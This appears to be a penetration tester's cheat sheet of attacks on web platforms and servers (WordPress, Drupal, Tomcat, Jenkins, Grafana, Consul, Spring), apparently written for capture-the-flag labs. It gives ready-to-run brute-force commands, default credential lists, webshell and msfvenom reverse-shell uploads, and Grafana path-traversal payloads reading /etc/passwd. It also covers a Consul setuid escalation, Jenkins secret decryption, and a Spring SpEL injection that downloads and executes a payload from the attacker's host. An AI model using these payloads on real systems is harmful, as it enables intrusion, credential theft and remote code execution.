CMS / Servers / Others
00. Webroot
/var/www/html/ # Apache
/usr/local/nginx/html/ # Nginx
c:\inetpub\wwwroot\ # IIS
C:\xampp\htdocs\ # XAMPP
01. Wordpress
Scan
## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>
## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>
## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php
Bruteforce password/username
## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>
## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>
Username/Password
select user_login,user_pass from wp_users;
Webshell
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i
## Or
## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php
## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php
## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>"})')"
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>","port":"4545"})')"
02. Joomla
## ------------------| Identify version
# Navigate to
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>
## ------------------| Run scan
joomscan -u <URL>
03. Drupal
03.1 Enumerations
## ------------------| Username enumeration
### Check whether we can register a new user (look for "name is already taken")
/user/register
### Check access status
/user/<number>
/user/1
### 403 --> user exists
### 404 --> user does not exist
## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ
03.2 Upload shell
## ------------------| Check "plugin php" status
/modules/php
### a 403 response --> "plugin php" exists/is installed
## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save
## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview
04. Tomcat
## ------------------| Endpoint permissions
/manager/html # <--- roles="manager-gui"
/manager/text/list # <--- roles="manager-script" [If we have access to /manager, we can use curl to upload a WAR file :)]
/host-manager/html # <--- roles="admin-gui"
## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/ # <--- does not work for uploading WAR files
/notexsits/..;/manager/ # <--- does not work for uploading WAR files
## Remember to put '/' at the end ^
## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>
## ------------------| Upload paths
/manager/deploy?war=file&path=/shell ## Tomcat6
/manager/text/deploy?path=/shell ## Tomcat7 and above
## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd
## ------------------| Manually Upload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war
## Then copy shell.war into the \tomcat\webapps\ directory
## Then run \bin\startup.[sh/bat] to restart the service; Tomcat unpacks the WAR file on startup.
## Now you can use http://<IP>/shell/
05. Nginx
## ------------------| If the config looks like this
location /admin {
<--code-->
}
## ------------------| It is likely vulnerable to path traversal (off-by-slash); try this
admin../config.php
05. SharePoint / OWA
05.1 SharePoint
## ------------------| Important directories
/_layouts/viewlsts.aspx
05.2 OWA
## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit
cd SprayingToolkit/
pip3 install -r requirements.txt
## ------------------| Create username list (the default format is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt
## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
06. Jenkins
Interesting endpoints
/manage
/script
Configuration files
## ------------------| Linux
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/config.xml
## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
Reset password [Read full post from here]
## ------------------| Method II
## Edit following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## The bcrypt password hash is stored under the <passwordHash> tag [here I used h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins
## ------------------| Decrypt Password
## If you have access to /script, run the following in the script console
## Get the password hash from \users\config.xml
hudson.util.Secret.decrypt '<HASH>'
## If not,
## Download following files
\users\admin_17207690984073220035\config.xml
\secrets\master.key
\secrets\hudson.util.Secret
## Download tool
wget https://raw.githubusercontent.com/gquere/pwn_jenkins/master/offline_decryption/jenkins_offline_decrypt.py
## Execute
python jenkins_offline_decrypt.py master.key hudson.util.Secret config.xml
Remote Code Execution
Create New Job
Schedule Method
Trigger Remotely Method
## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]"
## Ex: curl "http://h4rithd:11afe9af0327e90fed163da849a39837bc@object.htb:8080/job/TestRun/build?token=h4rithdToken"
07. Grafana
Config files
## ------------------|
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini
Unauthorized reading of files in Grafana [CVE-2021-43798] - videoPOC
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
08. Consul
echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p
09. Spring Framework
### Spring Boot version 2.6.5
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/
Spring Cloud Function Vulnerability(CVE-2022-22963)
## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection